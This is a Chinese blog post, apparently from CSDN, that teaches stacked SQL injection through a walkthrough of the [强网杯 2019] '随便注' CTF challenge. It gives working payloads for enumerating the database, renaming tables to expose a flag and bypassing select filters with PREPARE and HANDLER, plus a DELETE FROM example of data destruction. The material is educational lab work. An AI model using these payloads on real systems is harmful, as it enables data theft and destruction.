SQL注入之堆叠注入/预处理/handler-[强网杯 2019]随便注 1

最新推荐文章于 2023-05-06 21:21:18 发布
最新推荐文章于 2023-05-06 21:21:18 发布
阅读量1.8k 收藏 7
点赞数
分类专栏: 安全实践
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lilongsy/article/details/108596757
版权

堆叠注入介绍

所谓堆叠注入,就是把多条完整的SQL语句用分号分隔开,而不是用unionunion all连接起来。

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ;
结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union
injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union
all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE
FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where
productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。

举例:[强网杯 2019]随便注 1

首先检查注入类型:字符注入

1' or 1=1 #

1
返回了所有数据,说明是字符型注入。

再次检查字段数

1' order by 2  #
# 返回正常数据

1' order by 3  #
# error 1054 : Unknown column '3' in 'order clause'
# 报错,说明只有2个字段

查看数据库

1' union select 1, database()  #

报错:
1
说明服务端脚本过滤了一些select、update语句,那就试试堆叠注入:

1';show databases;#

1
找到数据库:supersqli。

查看数据表

1';show tables;#

1
找到两张表:1919810931114514、words。

查看表字段名

1';show columns from words;#
1';show columns from `1919810931114514`;#

1
从表结构可以知道前端?inject=1显示的是words表的数据。

1

获取flag

现在无法用SELECT来查询flag,只能通过修改表明和表结构,改成words表明。因为有GET请求中的id,所以表结构里必须包含id。
首先改一下1919810931114514的表结构:

1';ALTER TABLE `1919810931114514` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#

查一下此表结构,是否变换:
1
为了前端能显示出来,改名为’words’,原来的words表改为words2:

1';RENAME TABLE `words` TO `words2`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#

查看flag:

1' or 1=1 #

1

预处理绕过select限制

1';PREPARE st from concat('s','elect', ' * from `1919810931114514` ');EXECUTE st;#

1

handler绕过

';handler `1919810931114514` open;handler `1919810931114514` read first#

1

本地环境搭建

https://github.com/CTFTraining/qwb_2019_supersqli

参考

堆叠注入

小龙在山东
关注
专栏目录
sql注入
zejiiii的博客
02-15 3064
SQL注入注入分类 注入点分类 数字型注入 字符型注入 提交方式分类 提交方式分类 GET 方式注入 POST 方式注入 COOKIE 方式注入 HTTP 头部注入:XFF,UA,REFRERE 是否回显 联合查询 布尔盲 报错注入 时间盲 二次注入 堆叠查询(同时执行多条语句) 二 注入判断 工具扫描:网站漏扫工具,AWVS、AppScan、OWASP-ZAP、Nes
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1384
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
2019 第三届强网杯线上赛部分web复现
weixin_30881367的博客
05-28 664
0x00前言 周末打了强网杯,队伍只做得出来6道签到题,web有三道我仔细研究了但是没有最终做出来,赛后有在群里看到其他师傅提供了writeup和环境复现的docker环境,于是跟着学习一波并记录下来 0x01 upload 第一步扫目录发现有备份文件 下载下来后大致浏览就清楚是thinkphp5框架,并且没有远程代码执行漏洞 根据题目的数据传输情况,可以发现在登录后有个us...
[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入handler绕过)
笑花大王
02-23 782
简介 今天参加i春秋新春抗疫赛 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊 晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤。。。。 原题复现: 考察知识点:SQL注入漏洞-堆叠注入注入绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台...
sql 注入 handler命令
20岁爱吃必胜客
03-15 1073
HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…) [ WHERE where_condition ] [LIMIT … ] HANDLER tbl_name READ index_name { FIRST...
SQL注入Handler命令和堆叠注入
2201_75316477的博客
03-16 696
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。
i春秋网络安全公益赛 web blacklist利用mysql特性handler进行堆叠注入
qq_42188168的博客
02-24 269
题目过滤了很多东西,之前题目的利用set进行堆叠注入行不通了 但是去年看过飘零师傅的fudanctf的wp,嘻嘻,利用mysqlhandler进行注入。 https://www.4hou.com/posts/mM60 11’; handler FlagHere open as tgt;handler tgt read next;– ...
module "pages/index/wx-server-sdk" is not defined
游海东的技术专栏
09-02 6889
1、错误描述 VM542:1 thirdScriptError module "pages/index/wx-server-sdk" is not defined; [Component] Event Handler Error @ pages/index/index#bound submitData Error: module "pages/index/wx-server-sdk" is n...
关于提示bash: /usr/lib/command-not-found: /usr/bin/python3: bad interpreter: No such file or directory的错
热门推荐
nisi414的博客
08-13 1万+
因为博主也才刚刚接触Linux系统,所以可能说的也不太对,但是这是我自己解决的思路: Linux下出现python3:command找不到情况如下: bash: /usr/lib/command-not-found: /usr/bin/python3: bad interpreter: No such file or directory 首先先 cd /usr/bin/ 的路径下面 ls pyhon* 看看你的python3是不是黑底红色的,如果是就说明连接出了问题;同时弹出的会有其他版本的p
《从0到1:CTFer成长之路》SQL注入-2
tr_trTTT的博客
04-13 3300
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,既然是sql注入,那就可以通过手工或者sqlmap来进行注入 上面就是题目,有登录框,我们先用手工测试sql注入。 手工方法: 1. 随便输入一个账号试试: 输入admin显示账号或密码错误,输入其他显示账号不存在,所以这里可以判断账号是admin; 2.开始判断注入 ...
SQL注入-堆叠注入
jokerhappy的博客
07-26 522
堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而un
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 714
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。册页面不好使,然后就看WP了 二、 学到的&&am
堆叠注入,waf绕过 安全狗为主(18)
san3144393495的博客
05-06 358
讲这个例子,堆叠注入他的一个用处,注入的时候需要获取到管理员的账户密码,但密码是加密的,加密经常揭秘不出来,很正常,可以利用这个注入实现堆叠注入,就是插入数据,诸如的时候向管理员这个表里面插入一个数据,成功的给管理员添加一个新用户,之后在用插入的用户名密码去登陆,就不需要考虑密码解不出来。基本上一些常见漏洞都检测,他的检测是插件的那种方法,每次更新也都是更新的插件,他会对还会对工具检测的一些常见的工具,nmap,菜刀,sqlmap,和xxs漏洞检测等基本上的都会检测,默认的检测项目是url。
07_SQL注入_堆叠注入&绕过注入
qq_42171569的博客
06-03 1386
谈及堆叠,顾名思义:就是多条语句一同执行。实际开发中,部分数据库支持多条SQL语句同时执行,在这样的场景下进行SQL注入,我们是否能够在payload中构造多条可执行语句呢?当然可以。SQL语句中“;”代表了一条语句的结束,在写入payload时只需要用“;”分割多条语句,在限制不到位的情况下就可以自定义执行多条语句,案例如下:假设数据库中存在表users 如果恶意用户将参数人为构造成:垓参数与SQL语句进行拼接,就会变为:一旦恶意代码被执行,users表就会被删除通过上述案例,不难发现,对比与联合查询un
《小迪安全》第18天 SQL注入堆叠注入,WAF绕过注入
m0_56250796的博客
05-06 300
很多网站后台权限划分时常见以组划分,插入数据时意即可新建管理员权限的新账号。比如 dedecms 中的 dede_member 表,有 mtype 列,值为 'admin' 则为管理员。类似 Linux 文件系统的权限划分。
SQL注入堆叠及WAF绕过堆叠注入
weixin_46425310的博客
06-12 236
SQL注入堆叠及WAF绕过堆叠注入堆叠注入:多条SQL语句一起执行,本质上就是将多条SQL语句通过 ;来一起注入 WAF绕过:更改提交方式,但是必须保证参数可以通过不同的提交方式接受;若拦截了数据,如database()等,可以通过大小写,加密解密,编码函数,等价函数(例如用mid取代ascii),特殊符号(不影响SQL语句正常执行,而可以绕过WAF正则表达式的搜索),反序列化, 释符混用 (例如 select database()被拦截,但select (),select database均可以执
WEB漏洞-SQL注入堆叠及WAF绕过注入sql学习笔记)
qq_19375535的博客
07-02 370
sql学习笔记
mysql handler for_MYSQL神秘的HANDLER命令与实现方法
weixin_28981373的博客
01-18 600
MySQL“自古以来”都有一个神秘的HANDLER命令,而此命令非SQL标准语法,可以降低优化器对于SQL语句的解析与优化开销,从而提升查询性能。看到这里,可能有小伙伴不淡定了,这么好的东西为啥没广泛使用呢?这不是与几年前很夯的handlersocket插件类似吗?那么,我们先来看看Handler语法说明:HANDLER tbl_name OPEN [ [AS] alias]HANDLER tbl...
SQL注入——堆叠注入
Zhujiangcheng的博客
06-08 930
SQL注入简介——堆叠注入(一)SQL注入的概述和分类1.概述2.分类①按照数据提交的方式来分类:②按照执行效果来分类:③按照注入点类型来分类:(二)堆叠注入1.概念2.局限 (一)SQL注入的概述和分类 1.概述   首先说,什么是SQL注入?   程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤、转义、限制,或者处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据,这一构造字符串非法获取数据的过程就被称为SQL注入。 2.分类 (参考来源: link.) ①按照数
c.f.e.handler.GlobalExceptionHandler : ----------No handler found for GET /club/api/---- ----
最新发布
04-10
c.f.e.handler.GlobalExceptionHandler是一个全局异常处理器,用于处理在CSDN的后端应用中发生的异常情况。当请求的URL路径为"/club/api/"时,如果没有找到对应的处理器(handler),就会触发该异常处理器。 该异常处理器的作用是捕获并处理未被其他处理器处理的异常,以提供更友好的错误信息给用户。它可以通过自定义异常处理逻辑来返回适当的错误响应,例如返回一个自定义的错误页面或者一个包含错误信息的JSON响应。 相关问题: 1. CSDN后端应用中的异常处理机制是怎样的? 2. 什么是全局异常处理器? 3. 如何自定义异常处理逻辑? 4. 为什么需要提供友好的错误信息给用户?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小龙在山东

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值